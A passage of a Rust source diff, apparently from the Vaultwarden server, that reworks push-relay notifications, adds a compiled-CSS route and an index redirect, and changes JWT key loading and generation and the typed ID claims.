"revisionDate": format_date(&cipher.updated_at)
|
||||||
|
},
|
||||||
|
"clientType": null,
|
||||||
|
"installationId": null
|
||||||
}))
|
}))
|
||||||
.await;
|
.await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn push_logout(user: &User, acting_device_uuid: Option<String>) {
|
pub async fn push_logout(user: &User, acting_device_id: Option<DeviceId>, conn: &mut crate::db::DbConn) {
|
||||||
let acting_device_uuid: Value = acting_device_uuid.map(|v| v.into()).unwrap_or_else(|| Value::Null);
|
let acting_device_id: Value = acting_device_id.map(|v| v.to_string().into()).unwrap_or_else(|| Value::Null);
|
||||||
|
|
||||||
tokio::task::spawn(send_to_push_relay(json!({
|
if Device::check_user_has_push_device(&user.uuid, conn).await {
|
||||||
"userId": user.uuid,
|
|
||||||
"organizationId": (),
|
|
||||||
"deviceId": acting_device_uuid,
|
|
||||||
"identifier": acting_device_uuid,
|
|
||||||
"type": UpdateType::LogOut as i32,
|
|
||||||
"payload": {
|
|
||||||
"userId": user.uuid,
|
|
||||||
"date": user.updated_at
|
|
||||||
}
|
|
||||||
})));
|
|
||||||
}
|
|
||||||
|
|
||||||
pub fn push_user_update(ut: UpdateType, user: &User) {
|
|
||||||
tokio::task::spawn(send_to_push_relay(json!({
|
|
||||||
"userId": user.uuid,
|
|
||||||
"organizationId": (),
|
|
||||||
"deviceId": (),
|
|
||||||
"identifier": (),
|
|
||||||
"type": ut as i32,
|
|
||||||
"payload": {
|
|
||||||
"userId": user.uuid,
|
|
||||||
"date": user.updated_at
|
|
||||||
}
|
|
||||||
})));
|
|
||||||
}
|
|
||||||
|
|
||||||
pub async fn push_folder_update(
|
|
||||||
ut: UpdateType,
|
|
||||||
folder: &Folder,
|
|
||||||
acting_device_uuid: &String,
|
|
||||||
conn: &mut crate::db::DbConn,
|
|
||||||
) {
|
|
||||||
if Device::check_user_has_push_device(&folder.user_uuid, conn).await {
|
|
||||||
tokio::task::spawn(send_to_push_relay(json!({
|
tokio::task::spawn(send_to_push_relay(json!({
|
||||||
"userId": folder.user_uuid,
|
"userId": user.uuid,
|
||||||
"organizationId": (),
|
"organizationId": (),
|
||||||
"deviceId": acting_device_uuid,
|
"deviceId": acting_device_id,
|
||||||
"identifier": acting_device_uuid,
|
"identifier": acting_device_id,
|
||||||
"type": ut as i32,
|
"type": UpdateType::LogOut as i32,
|
||||||
"payload": {
|
"payload": {
|
||||||
"id": folder.uuid,
|
"userId": user.uuid,
|
||||||
"userId": folder.user_uuid,
|
"date": format_date(&user.updated_at)
|
||||||
"revisionDate": folder.updated_at
|
},
|
||||||
}
|
"clientType": null,
|
||||||
|
"installationId": null
|
||||||
})));
|
})));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn push_send_update(ut: UpdateType, send: &Send, acting_device_uuid: &String, conn: &mut crate::db::DbConn) {
|
pub async fn push_user_update(ut: UpdateType, user: &User, push_uuid: &Option<PushId>, conn: &mut crate::db::DbConn) {
|
||||||
|
if Device::check_user_has_push_device(&user.uuid, conn).await {
|
||||||
|
tokio::task::spawn(send_to_push_relay(json!({
|
||||||
|
"userId": user.uuid,
|
||||||
|
"organizationId": null,
|
||||||
|
"deviceId": push_uuid,
|
||||||
|
"identifier": null,
|
||||||
|
"type": ut as i32,
|
||||||
|
"payload": {
|
||||||
|
"userId": user.uuid,
|
||||||
|
"date": format_date(&user.updated_at)
|
||||||
|
},
|
||||||
|
"clientType": null,
|
||||||
|
"installationId": null
|
||||||
|
})));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn push_folder_update(ut: UpdateType, folder: &Folder, device: &Device, conn: &mut crate::db::DbConn) {
|
||||||
|
if Device::check_user_has_push_device(&folder.user_uuid, conn).await {
|
||||||
|
tokio::task::spawn(send_to_push_relay(json!({
|
||||||
|
"userId": folder.user_uuid,
|
||||||
|
"organizationId": null,
|
||||||
|
"deviceId": device.push_uuid, // Should be the records unique uuid of the acting device (unique uuid per user/device)
|
||||||
|
"identifier": device.uuid, // Should be the acting device id (aka uuid per device/app)
|
||||||
|
"type": ut as i32,
|
||||||
|
"payload": {
|
||||||
|
"id": folder.uuid,
|
||||||
|
"userId": folder.user_uuid,
|
||||||
|
"revisionDate": format_date(&folder.updated_at)
|
||||||
|
},
|
||||||
|
"clientType": null,
|
||||||
|
"installationId": null
|
||||||
|
})));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn push_send_update(ut: UpdateType, send: &Send, device: &Device, conn: &mut crate::db::DbConn) {
|
||||||
if let Some(s) = &send.user_uuid {
|
if let Some(s) = &send.user_uuid {
|
||||||
if Device::check_user_has_push_device(s, conn).await {
|
if Device::check_user_has_push_device(s, conn).await {
|
||||||
tokio::task::spawn(send_to_push_relay(json!({
|
tokio::task::spawn(send_to_push_relay(json!({
|
||||||
"userId": send.user_uuid,
|
"userId": send.user_uuid,
|
||||||
"organizationId": (),
|
"organizationId": null,
|
||||||
"deviceId": acting_device_uuid,
|
"deviceId": device.push_uuid, // Should be the records unique uuid of the acting device (unique uuid per user/device)
|
||||||
"identifier": acting_device_uuid,
|
"identifier": device.uuid, // Should be the acting device id (aka uuid per device/app)
|
||||||
"type": ut as i32,
|
"type": ut as i32,
|
||||||
"payload": {
|
"payload": {
|
||||||
"id": send.uuid,
|
"id": send.uuid,
|
||||||
"userId": send.user_uuid,
|
"userId": send.user_uuid,
|
||||||
"revisionDate": send.revision_date
|
"revisionDate": format_date(&send.revision_date)
|
||||||
}
|
},
|
||||||
|
"clientType": null,
|
||||||
|
"installationId": null
|
||||||
})));
|
})));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -256,18 +266,25 @@ async fn send_to_push_relay(notification_data: Value) {
|
|||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
let auth_push_token = match get_auth_push_token().await {
|
let auth_api_token = match get_auth_api_token().await {
|
||||||
Ok(s) => s,
|
Ok(s) => s,
|
||||||
Err(e) => {
|
Err(e) => {
|
||||||
debug!("Could not get the auth push token: {}", e);
|
debug!("Could not get the auth push token: {e}");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
};
|
};
|
||||||
|
|
||||||
let auth_header = format!("Bearer {}", &auth_push_token);
|
let auth_header = format!("Bearer {auth_api_token}");
|
||||||
|
|
||||||
if let Err(e) = get_reqwest_client()
|
let req = match make_http_request(Method::POST, &(CONFIG.push_relay_uri() + "/push/send")) {
|
||||||
.post(CONFIG.push_relay_uri() + "/push/send")
|
Ok(r) => r,
|
||||||
|
Err(e) => {
|
||||||
|
error!("An error occurred while sending a send update to the push relay: {e}");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
if let Err(e) = req
|
||||||
.header(ACCEPT, "application/json")
|
.header(ACCEPT, "application/json")
|
||||||
.header(CONTENT_TYPE, "application/json")
|
.header(CONTENT_TYPE, "application/json")
|
||||||
.header(AUTHORIZATION, &auth_header)
|
.header(AUTHORIZATION, &auth_header)
|
||||||
@@ -275,43 +292,47 @@ async fn send_to_push_relay(notification_data: Value) {
|
|||||||
.send()
|
.send()
|
||||||
.await
|
.await
|
||||||
{
|
{
|
||||||
error!("An error occurred while sending a send update to the push relay: {}", e);
|
error!("An error occurred while sending a send update to the push relay: {e}");
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn push_auth_request(user_uuid: String, auth_request_uuid: String, conn: &mut crate::db::DbConn) {
|
pub async fn push_auth_request(user_id: &UserId, auth_request_id: &str, device: &Device, conn: &mut crate::db::DbConn) {
|
||||||
if Device::check_user_has_push_device(user_uuid.as_str(), conn).await {
|
if Device::check_user_has_push_device(user_id, conn).await {
|
||||||
tokio::task::spawn(send_to_push_relay(json!({
|
tokio::task::spawn(send_to_push_relay(json!({
|
||||||
"userId": user_uuid,
|
"userId": user_id,
|
||||||
"organizationId": (),
|
"organizationId": null,
|
||||||
"deviceId": null,
|
"deviceId": device.push_uuid, // Should be the records unique uuid of the acting device (unique uuid per user/device)
|
||||||
"identifier": null,
|
"identifier": device.uuid, // Should be the acting device id (aka uuid per device/app)
|
||||||
"type": UpdateType::AuthRequest as i32,
|
"type": UpdateType::AuthRequest as i32,
|
||||||
"payload": {
|
"payload": {
|
||||||
"id": auth_request_uuid,
|
"userId": user_id,
|
||||||
"userId": user_uuid,
|
"id": auth_request_id,
|
||||||
}
|
},
|
||||||
|
"clientType": null,
|
||||||
|
"installationId": null
|
||||||
})));
|
})));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn push_auth_response(
|
pub async fn push_auth_response(
|
||||||
user_uuid: String,
|
user_id: &UserId,
|
||||||
auth_request_uuid: String,
|
auth_request_id: &AuthRequestId,
|
||||||
approving_device_uuid: String,
|
device: &Device,
|
||||||
conn: &mut crate::db::DbConn,
|
conn: &mut crate::db::DbConn,
|
||||||
) {
|
) {
|
||||||
if Device::check_user_has_push_device(user_uuid.as_str(), conn).await {
|
if Device::check_user_has_push_device(user_id, conn).await {
|
||||||
tokio::task::spawn(send_to_push_relay(json!({
|
tokio::task::spawn(send_to_push_relay(json!({
|
||||||
"userId": user_uuid,
|
"userId": user_id,
|
||||||
"organizationId": (),
|
"organizationId": null,
|
||||||
"deviceId": approving_device_uuid,
|
"deviceId": device.push_uuid, // Should be the records unique uuid of the acting device (unique uuid per user/device)
|
||||||
"identifier": approving_device_uuid,
|
"identifier": device.uuid, // Should be the acting device id (aka uuid per device/app)
|
||||||
"type": UpdateType::AuthRequestResponse as i32,
|
"type": UpdateType::AuthRequestResponse as i32,
|
||||||
"payload": {
|
"payload": {
|
||||||
"id": auth_request_uuid,
|
"userId": user_id,
|
||||||
"userId": user_uuid,
|
"id": auth_request_id,
|
||||||
}
|
},
|
||||||
|
"clientType": null,
|
||||||
|
"installationId": null
|
||||||
})));
|
})));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -1,13 +1,20 @@
|
|||||||
use std::path::{Path, PathBuf};
|
use std::path::{Path, PathBuf};
|
||||||
|
|
||||||
use rocket::{fs::NamedFile, http::ContentType, response::content::RawHtml as Html, serde::json::Json, Catcher, Route};
|
use rocket::{
|
||||||
|
fs::NamedFile,
|
||||||
|
http::ContentType,
|
||||||
|
response::{content::RawCss as Css, content::RawHtml as Html, Redirect},
|
||||||
|
serde::json::Json,
|
||||||
|
Catcher, Route,
|
||||||
|
};
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{core::now, ApiResult, EmptyResult},
|
api::{core::now, ApiResult, EmptyResult},
|
||||||
auth::decode_file_download,
|
auth::decode_file_download,
|
||||||
|
db::models::{AttachmentId, CipherId},
|
||||||
error::Error,
|
error::Error,
|
||||||
util::{Cached, SafeString},
|
util::Cached,
|
||||||
CONFIG,
|
CONFIG,
|
||||||
};
|
};
|
||||||
|
|
||||||
@@ -16,7 +23,7 @@ pub fn routes() -> Vec<Route> {
|
|||||||
// crate::utils::LOGGED_ROUTES to make sure they appear in the log
|
// crate::utils::LOGGED_ROUTES to make sure they appear in the log
|
||||||
let mut routes = routes![attachments, alive, alive_head, static_files];
|
let mut routes = routes![attachments, alive, alive_head, static_files];
|
||||||
if CONFIG.web_vault_enabled() {
|
if CONFIG.web_vault_enabled() {
|
||||||
routes.append(&mut routes![web_index, web_index_head, app_id, web_files]);
|
routes.append(&mut routes![web_index, web_index_direct, web_index_head, app_id, web_files, vaultwarden_css]);
|
||||||
}
|
}
|
||||||
|
|
||||||
#[cfg(debug_assertions)]
|
#[cfg(debug_assertions)]
|
||||||
@@ -45,11 +52,66 @@ fn not_found() -> ApiResult<Html<String>> {
|
|||||||
Ok(Html(text))
|
Ok(Html(text))
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[get("/css/vaultwarden.css")]
|
||||||
|
fn vaultwarden_css() -> Cached<Css<String>> {
|
||||||
|
let css_options = json!({
|
||||||
|
"signup_disabled": !CONFIG.signups_allowed() && CONFIG.signups_domains_whitelist().is_empty(),
|
||||||
|
"mail_enabled": CONFIG.mail_enabled(),
|
||||||
|
"mail_2fa_enabled": CONFIG._enable_email_2fa(),
|
||||||
|
"yubico_enabled": CONFIG._enable_yubico() && CONFIG.yubico_client_id().is_some() && CONFIG.yubico_secret_key().is_some(),
|
||||||
|
"emergency_access_allowed": CONFIG.emergency_access_allowed(),
|
||||||
|
"sends_allowed": CONFIG.sends_allowed(),
|
||||||
|
"load_user_scss": true,
|
||||||
|
});
|
||||||
|
|
||||||
|
let scss = match CONFIG.render_template("scss/vaultwarden.scss", &css_options) {
|
||||||
|
Ok(t) => t,
|
||||||
|
Err(e) => {
|
||||||
|
// Something went wrong loading the template. Use the fallback
|
||||||
|
warn!("Loading scss/vaultwarden.scss.hbs or scss/user.vaultwarden.scss.hbs failed. {e}");
|
||||||
|
CONFIG
|
||||||
|
.render_fallback_template("scss/vaultwarden.scss", &css_options)
|
||||||
|
.expect("Fallback scss/vaultwarden.scss.hbs to render")
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
let css = match grass_compiler::from_string(
|
||||||
|
scss,
|
||||||
|
&grass_compiler::Options::default().style(grass_compiler::OutputStyle::Compressed),
|
||||||
|
) {
|
||||||
|
Ok(css) => css,
|
||||||
|
Err(e) => {
|
||||||
|
// Something went wrong compiling the scss. Use the fallback
|
||||||
|
warn!("Compiling the Vaultwarden SCSS styles failed. {e}");
|
||||||
|
let mut css_options = css_options;
|
||||||
|
css_options["load_user_scss"] = json!(false);
|
||||||
|
let scss = CONFIG
|
||||||
|
.render_fallback_template("scss/vaultwarden.scss", &css_options)
|
||||||
|
.expect("Fallback scss/vaultwarden.scss.hbs to render");
|
||||||
|
grass_compiler::from_string(
|
||||||
|
scss,
|
||||||
|
&grass_compiler::Options::default().style(grass_compiler::OutputStyle::Compressed),
|
||||||
|
)
|
||||||
|
.expect("SCSS to compile")
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
// Cache for one day should be enough and not too much
|
||||||
|
Cached::ttl(Css(css), 86_400, false)
|
||||||
|
}
|
||||||
|
|
||||||
#[get("/")]
|
#[get("/")]
|
||||||
async fn web_index() -> Cached<Option<NamedFile>> {
|
async fn web_index() -> Cached<Option<NamedFile>> {
|
||||||
Cached::short(NamedFile::open(Path::new(&CONFIG.web_vault_folder()).join("index.html")).await.ok(), false)
|
Cached::short(NamedFile::open(Path::new(&CONFIG.web_vault_folder()).join("index.html")).await.ok(), false)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Make sure that `/index.html` redirect to actual domain path.
|
||||||
|
// If not, this might cause issues with the web-vault
|
||||||
|
#[get("/index.html")]
|
||||||
|
fn web_index_direct() -> Redirect {
|
||||||
|
Redirect::to(format!("{}/", CONFIG.domain_path()))
|
||||||
|
}
|
||||||
|
|
||||||
#[head("/")]
|
#[head("/")]
|
||||||
fn web_index_head() -> EmptyResult {
|
fn web_index_head() -> EmptyResult {
|
||||||
// Add an explicit HEAD route to prevent uptime monitoring services from
|
// Add an explicit HEAD route to prevent uptime monitoring services from
|
||||||
@@ -98,16 +160,16 @@ async fn web_files(p: PathBuf) -> Cached<Option<NamedFile>> {
|
|||||||
Cached::long(NamedFile::open(Path::new(&CONFIG.web_vault_folder()).join(p)).await.ok(), true)
|
Cached::long(NamedFile::open(Path::new(&CONFIG.web_vault_folder()).join(p)).await.ok(), true)
|
||||||
}
|
}
|
||||||
|
|
||||||
#[get("/attachments/<uuid>/<file_id>?<token>")]
|
#[get("/attachments/<cipher_id>/<file_id>?<token>")]
|
||||||
async fn attachments(uuid: SafeString, file_id: SafeString, token: String) -> Option<NamedFile> {
|
async fn attachments(cipher_id: CipherId, file_id: AttachmentId, token: String) -> Option<NamedFile> {
|
||||||
let Ok(claims) = decode_file_download(&token) else {
|
let Ok(claims) = decode_file_download(&token) else {
|
||||||
return None;
|
return None;
|
||||||
};
|
};
|
||||||
if claims.sub != *uuid || claims.file_id != *file_id {
|
if claims.sub != cipher_id || claims.file_id != file_id {
|
||||||
return None;
|
return None;
|
||||||
}
|
}
|
||||||
|
|
||||||
NamedFile::open(Path::new(&CONFIG.attachments_folder()).join(uuid).join(file_id)).await.ok()
|
NamedFile::open(Path::new(&CONFIG.attachments_folder()).join(cipher_id.as_ref()).join(file_id.as_ref())).await.ok()
|
||||||
}
|
}
|
||||||
|
|
||||||
// We use DbConn here to let the alive healthcheck also verify the database connection.
|
// We use DbConn here to let the alive healthcheck also verify the database connection.
|
||||||
@@ -170,7 +232,7 @@ pub fn static_files(filename: &str) -> Result<(ContentType, &'static [u8]), Erro
|
|||||||
}
|
}
|
||||||
"bootstrap.css" => Ok((ContentType::CSS, include_bytes!("../static/scripts/bootstrap.css"))),
|
"bootstrap.css" => Ok((ContentType::CSS, include_bytes!("../static/scripts/bootstrap.css"))),
|
||||||
"bootstrap.bundle.js" => Ok((ContentType::JavaScript, include_bytes!("../static/scripts/bootstrap.bundle.js"))),
|
"bootstrap.bundle.js" => Ok((ContentType::JavaScript, include_bytes!("../static/scripts/bootstrap.bundle.js"))),
|
||||||
"jdenticon.js" => Ok((ContentType::JavaScript, include_bytes!("../static/scripts/jdenticon.js"))),
|
"jdenticon-3.3.0.js" => Ok((ContentType::JavaScript, include_bytes!("../static/scripts/jdenticon-3.3.0.js"))),
|
||||||
"datatables.js" => Ok((ContentType::JavaScript, include_bytes!("../static/scripts/datatables.js"))),
|
"datatables.js" => Ok((ContentType::JavaScript, include_bytes!("../static/scripts/datatables.js"))),
|
||||||
"datatables.css" => Ok((ContentType::CSS, include_bytes!("../static/scripts/datatables.css"))),
|
"datatables.css" => Ok((ContentType::CSS, include_bytes!("../static/scripts/datatables.css"))),
|
||||||
"jquery-3.7.1.slim.js" => {
|
"jquery-3.7.1.slim.js" => {
|
||||||
|
|||||||
467
src/auth.rs
467
src/auth.rs
@@ -1,18 +1,26 @@
|
|||||||
// JWT Handling
|
// JWT Handling
|
||||||
//
|
//
|
||||||
use chrono::{Duration, Utc};
|
use chrono::{TimeDelta, Utc};
|
||||||
|
use jsonwebtoken::{errors::ErrorKind, Algorithm, DecodingKey, EncodingKey, Header};
|
||||||
use num_traits::FromPrimitive;
|
use num_traits::FromPrimitive;
|
||||||
use once_cell::sync::Lazy;
|
use once_cell::sync::{Lazy, OnceCell};
|
||||||
|
use openssl::rsa::Rsa;
|
||||||
use jsonwebtoken::{self, errors::ErrorKind, Algorithm, DecodingKey, EncodingKey, Header};
|
|
||||||
use serde::de::DeserializeOwned;
|
use serde::de::DeserializeOwned;
|
||||||
use serde::ser::Serialize;
|
use serde::ser::Serialize;
|
||||||
|
use std::{env, net::IpAddr};
|
||||||
|
|
||||||
|
use crate::{
|
||||||
|
config::PathType,
|
||||||
|
db::models::{
|
||||||
|
AttachmentId, CipherId, CollectionId, DeviceId, EmergencyAccessId, MembershipId, OrgApiKeyId, OrganizationId,
|
||||||
|
SendFileId, SendId, UserId,
|
||||||
|
},
|
||||||
|
};
|
||||||
use crate::{error::Error, CONFIG};
|
use crate::{error::Error, CONFIG};
|
||||||
|
|
||||||
const JWT_ALGORITHM: Algorithm = Algorithm::RS256;
|
const JWT_ALGORITHM: Algorithm = Algorithm::RS256;
|
||||||
|
|
||||||
pub static DEFAULT_VALIDITY: Lazy<Duration> = Lazy::new(|| Duration::hours(2));
|
pub static DEFAULT_VALIDITY: Lazy<TimeDelta> = Lazy::new(|| TimeDelta::try_hours(2).unwrap());
|
||||||
static JWT_HEADER: Lazy<Header> = Lazy::new(|| Header::new(JWT_ALGORITHM));
|
static JWT_HEADER: Lazy<Header> = Lazy::new(|| Header::new(JWT_ALGORITHM));
|
||||||
|
|
||||||
pub static JWT_LOGIN_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|login", CONFIG.domain_origin()));
|
pub static JWT_LOGIN_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|login", CONFIG.domain_origin()));
|
||||||
@@ -25,24 +33,53 @@ static JWT_ADMIN_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|admin", CONFIG.
|
|||||||
static JWT_SEND_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|send", CONFIG.domain_origin()));
|
static JWT_SEND_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|send", CONFIG.domain_origin()));
|
||||||
static JWT_ORG_API_KEY_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|api.organization", CONFIG.domain_origin()));
|
static JWT_ORG_API_KEY_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|api.organization", CONFIG.domain_origin()));
|
||||||
static JWT_FILE_DOWNLOAD_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|file_download", CONFIG.domain_origin()));
|
static JWT_FILE_DOWNLOAD_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|file_download", CONFIG.domain_origin()));
|
||||||
|
static JWT_REGISTER_VERIFY_ISSUER: Lazy<String> = Lazy::new(|| format!("{}|register_verify", CONFIG.domain_origin()));
|
||||||
|
|
||||||
static PRIVATE_RSA_KEY: Lazy<EncodingKey> = Lazy::new(|| {
|
static PRIVATE_RSA_KEY: OnceCell<EncodingKey> = OnceCell::new();
|
||||||
let key =
|
static PUBLIC_RSA_KEY: OnceCell<DecodingKey> = OnceCell::new();
|
||||||
std::fs::read(CONFIG.private_rsa_key()).unwrap_or_else(|e| panic!("Error loading private RSA Key. \n{e}"));
|
|
||||||
EncodingKey::from_rsa_pem(&key).unwrap_or_else(|e| panic!("Error decoding private RSA Key.\n{e}"))
|
|
||||||
});
|
|
||||||
static PUBLIC_RSA_KEY: Lazy<DecodingKey> = Lazy::new(|| {
|
|
||||||
let key = std::fs::read(CONFIG.public_rsa_key()).unwrap_or_else(|e| panic!("Error loading public RSA Key. \n{e}"));
|
|
||||||
DecodingKey::from_rsa_pem(&key).unwrap_or_else(|e| panic!("Error decoding public RSA Key.\n{e}"))
|
|
||||||
});
|
|
||||||
|
|
||||||
pub fn load_keys() {
|
pub async fn initialize_keys() -> Result<(), Error> {
|
||||||
Lazy::force(&PRIVATE_RSA_KEY);
|
use std::io::Error;
|
||||||
Lazy::force(&PUBLIC_RSA_KEY);
|
|
||||||
|
let rsa_key_filename = std::path::PathBuf::from(CONFIG.private_rsa_key())
|
||||||
|
.file_name()
|
||||||
|
.ok_or_else(|| Error::other("Private RSA key path missing filename"))?
|
||||||
|
.to_str()
|
||||||
|
.ok_or_else(|| Error::other("Private RSA key path filename is not valid UTF-8"))?
|
||||||
|
.to_string();
|
||||||
|
|
||||||
|
let operator = CONFIG.opendal_operator_for_path_type(PathType::RsaKey).map_err(Error::other)?;
|
||||||
|
|
||||||
|
let priv_key_buffer = match operator.read(&rsa_key_filename).await {
|
||||||
|
Ok(buffer) => Some(buffer),
|
||||||
|
Err(e) if e.kind() == opendal::ErrorKind::NotFound => None,
|
||||||
|
Err(e) => return Err(e.into()),
|
||||||
|
};
|
||||||
|
|
||||||
|
let (priv_key, priv_key_buffer) = if let Some(priv_key_buffer) = priv_key_buffer {
|
||||||
|
(Rsa::private_key_from_pem(priv_key_buffer.to_vec().as_slice())?, priv_key_buffer.to_vec())
|
||||||
|
} else {
|
||||||
|
let rsa_key = Rsa::generate(2048)?;
|
||||||
|
let priv_key_buffer = rsa_key.private_key_to_pem()?;
|
||||||
|
operator.write(&rsa_key_filename, priv_key_buffer.clone()).await?;
|
||||||
|
info!("Private key '{}' created correctly", CONFIG.private_rsa_key());
|
||||||
|
(rsa_key, priv_key_buffer)
|
||||||
|
};
|
||||||
|
let pub_key_buffer = priv_key.public_key_to_pem()?;
|
||||||
|
|
||||||
|
let enc = EncodingKey::from_rsa_pem(&priv_key_buffer)?;
|
||||||
|
let dec: DecodingKey = DecodingKey::from_rsa_pem(&pub_key_buffer)?;
|
||||||
|
if PRIVATE_RSA_KEY.set(enc).is_err() {
|
||||||
|
err!("PRIVATE_RSA_KEY must only be initialized once")
|
||||||
|
}
|
||||||
|
if PUBLIC_RSA_KEY.set(dec).is_err() {
|
||||||
|
err!("PUBLIC_RSA_KEY must only be initialized once")
|
||||||
|
}
|
||||||
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn encode_jwt<T: Serialize>(claims: &T) -> String {
|
pub fn encode_jwt<T: Serialize>(claims: &T) -> String {
|
||||||
match jsonwebtoken::encode(&JWT_HEADER, claims, &PRIVATE_RSA_KEY) {
|
match jsonwebtoken::encode(&JWT_HEADER, claims, PRIVATE_RSA_KEY.wait()) {
|
||||||
Ok(token) => token,
|
Ok(token) => token,
|
||||||
Err(e) => panic!("Error encoding jwt {e}"),
|
Err(e) => panic!("Error encoding jwt {e}"),
|
||||||
}
|
}
|
||||||
@@ -56,7 +93,7 @@ fn decode_jwt<T: DeserializeOwned>(token: &str, issuer: String) -> Result<T, Err
|
|||||||
validation.set_issuer(&[issuer]);
|
validation.set_issuer(&[issuer]);
|
||||||
|
|
||||||
let token = token.replace(char::is_whitespace, "");
|
let token = token.replace(char::is_whitespace, "");
|
||||||
match jsonwebtoken::decode(&token, &PUBLIC_RSA_KEY, &validation) {
|
match jsonwebtoken::decode(&token, PUBLIC_RSA_KEY.wait(), &validation) {
|
||||||
Ok(d) => Ok(d.claims),
|
Ok(d) => Ok(d.claims),
|
||||||
Err(err) => match *err.kind() {
|
Err(err) => match *err.kind() {
|
||||||
ErrorKind::InvalidToken => err!("Token is invalid"),
|
ErrorKind::InvalidToken => err!("Token is invalid"),
|
||||||
@@ -103,6 +140,10 @@ pub fn decode_file_download(token: &str) -> Result<FileDownloadClaims, Error> {
|
|||||||
decode_jwt(token, JWT_FILE_DOWNLOAD_ISSUER.to_string())
|
decode_jwt(token, JWT_FILE_DOWNLOAD_ISSUER.to_string())
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub fn decode_register_verify(token: &str) -> Result<RegisterVerifyClaims, Error> {
|
||||||
|
decode_jwt(token, JWT_REGISTER_VERIFY_ISSUER.to_string())
|
||||||
|
}
|
||||||
|
|
||||||
#[derive(Debug, Serialize, Deserialize)]
|
#[derive(Debug, Serialize, Deserialize)]
|
||||||
pub struct LoginJwtClaims {
|
pub struct LoginJwtClaims {
|
||||||
// Not before
|
// Not before
|
||||||
@@ -112,7 +153,7 @@ pub struct LoginJwtClaims {
|
|||||||
// Issuer
|
// Issuer
|
||||||
pub iss: String,
|
pub iss: String,
|
||||||
// Subject
|
// Subject
|
||||||
pub sub: String,
|
pub sub: UserId,
|
||||||
|
|
||||||
pub premium: bool,
|
pub premium: bool,
|
||||||
pub name: String,
|
pub name: String,
|
||||||
@@ -133,7 +174,12 @@ pub struct LoginJwtClaims {
|
|||||||
// user security_stamp
|
// user security_stamp
|
||||||
pub sstamp: String,
|
pub sstamp: String,
|
||||||
// device uuid
|
// device uuid
|
||||||
pub device: String,
|
pub device: DeviceId,
|
||||||
|
// what kind of device, like FirefoxBrowser or Android derived from DeviceType
|
||||||
|
pub devicetype: String,
|
||||||
|
// the type of client_id, like web, cli, desktop, browser or mobile
|
||||||
|
pub client_id: String,
|
||||||
|
|
||||||
// [ "api", "offline_access" ]
|
// [ "api", "offline_access" ]
|
||||||
pub scope: Vec<String>,
|
pub scope: Vec<String>,
|
||||||
// [ "Application" ]
|
// [ "Application" ]
|
||||||
@@ -149,31 +195,31 @@ pub struct InviteJwtClaims {
|
|||||||
// Issuer
|
// Issuer
|
||||||
pub iss: String,
|
pub iss: String,
|
||||||
// Subject
|
// Subject
|
||||||
pub sub: String,
|
pub sub: UserId,
|
||||||
|
|
||||||
pub email: String,
|
pub email: String,
|
||||||
pub org_id: Option<String>,
|
pub org_id: OrganizationId,
|
||||||
pub user_org_id: Option<String>,
|
pub member_id: MembershipId,
|
||||||
pub invited_by_email: Option<String>,
|
pub invited_by_email: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn generate_invite_claims(
|
pub fn generate_invite_claims(
|
||||||
uuid: String,
|
user_id: UserId,
|
||||||
email: String,
|
email: String,
|
||||||
org_id: Option<String>,
|
org_id: OrganizationId,
|
||||||
user_org_id: Option<String>,
|
member_id: MembershipId,
|
||||||
invited_by_email: Option<String>,
|
invited_by_email: Option<String>,
|
||||||
) -> InviteJwtClaims {
|
) -> InviteJwtClaims {
|
||||||
let time_now = Utc::now().naive_utc();
|
let time_now = Utc::now();
|
||||||
let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
|
let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
|
||||||
InviteJwtClaims {
|
InviteJwtClaims {
|
||||||
nbf: time_now.timestamp(),
|
nbf: time_now.timestamp(),
|
||||||
exp: (time_now + Duration::hours(expire_hours)).timestamp(),
|
exp: (time_now + TimeDelta::try_hours(expire_hours).unwrap()).timestamp(),
|
||||||
iss: JWT_INVITE_ISSUER.to_string(),
|
iss: JWT_INVITE_ISSUER.to_string(),
|
||||||
sub: uuid,
|
sub: user_id,
|
||||||
email,
|
email,
|
||||||
org_id,
|
org_id,
|
||||||
user_org_id,
|
member_id,
|
||||||
invited_by_email,
|
invited_by_email,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -187,28 +233,28 @@ pub struct EmergencyAccessInviteJwtClaims {
|
|||||||
// Issuer
|
// Issuer
|
||||||
pub iss: String,
|
pub iss: String,
|
||||||
// Subject
|
// Subject
|
||||||
pub sub: String,
|
pub sub: UserId,
|
||||||
|
|
||||||
pub email: String,
|
pub email: String,
|
||||||
pub emer_id: String,
|
pub emer_id: EmergencyAccessId,
|
||||||
pub grantor_name: String,
|
pub grantor_name: String,
|
||||||
pub grantor_email: String,
|
